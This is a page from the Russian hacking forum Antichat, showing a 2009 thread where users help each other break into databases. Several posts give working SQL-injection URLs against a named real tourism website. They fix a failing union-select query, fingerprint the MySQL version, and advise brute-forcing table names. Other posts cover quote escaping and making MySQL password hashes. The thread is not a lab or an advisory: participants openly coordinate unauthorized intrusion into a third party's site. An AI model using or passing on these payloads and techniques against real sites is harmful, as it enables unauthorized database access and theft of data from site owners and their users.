ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8171  
Старый 19.07.2009, 10:05
Аватар для it's my
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Цитата:
Сообщение от Byrger  
http://forum.antichat.ru/showpost.php?p=1389998&postcount=8135

Помогите по данному вопросу.
кавычка слэшируется просто?
INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0\\\'')
 
Ответить с цитированием

  #8172  
Старый 19.07.2009, 12:22
Аватар для Byrger
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Цитата:
Сообщение от it's my  
кавычка слэшируется просто?
INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0\\\'')
да 3 слеша
 
Ответить с цитированием

  #8173  
Старый 20.07.2009, 00:20
Аватар для +casper+
+casper+
Banned
Регистрация: 27.06.2009
Сообщений: 200
Провел на форуме:
944465

Репутация: 68
Отправить сообщение для +casper+ с помощью ICQ
По умолчанию

У меня вопрос. Я тут
Цитата:
http://www.bringitontours.com/package/index.php?destination_id=
Хотел заюзать уязвимость в БД, определил количество таблиц 3, но неполучаеться узнать их названия. Вот запрос
Цитата:
http://www.bringitontours.com/package/index.php?destination_id=1+union+select+table_sche ma,table_name,1,2,3+from+information_schema.tables .
Где ошибка?
 
Ответить с цитированием

  #8174  
Старый 20.07.2009, 00:28
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

2 +casper+
1) ты неправильно составил запрос ... должно было быть так
Цитата:
http://www.bringitontours.com/package/index.php?destination_id=-1+union+select+1,2,version()
2)там стоит 4 ветка соответсвено там нет information_schema
 
Ответить с цитированием

  #8175  
Старый 20.07.2009, 00:32
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

В ДНК, 4-ая ветка потому что:

Код:
http://www.bringitontours.com/package/index.php?destination_id=1+and+substring(version(),1,1)=4
 
Ответить с цитированием

  #8176  
Старый 20.07.2009, 00:48
Аватар для +casper+
+casper+
Banned
Регистрация: 27.06.2009
Сообщений: 200
Провел на форуме:
944465

Репутация: 68
Отправить сообщение для +casper+ с помощью ICQ
По умолчанию

А как мне правильно сформировать запрос что б глянуть названия всех таблиц?
 
Ответить с цитированием

  #8177  
Старый 20.07.2009, 00:57
Аватар для Fata1ex
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Только перебор. Сипт в подписи предыдущего дяди
 
Ответить с цитированием

  #8178  
Старый 20.07.2009, 12:09
Аватар для wolmer
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503

Репутация: 229
По умолчанию

Собственно есть пароль... Надо его преобразовать в mysql5 хеш, как это сделать?
 
Ответить с цитированием

  #8179  
Старый 20.07.2009, 12:14
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

http://www.insidepro.com/hashes.php
 
Ответить с цитированием

  #8180  
Старый 20.07.2009, 14:29
Аватар для S00pY
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

MySQL>SELECT password( 'password' )
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ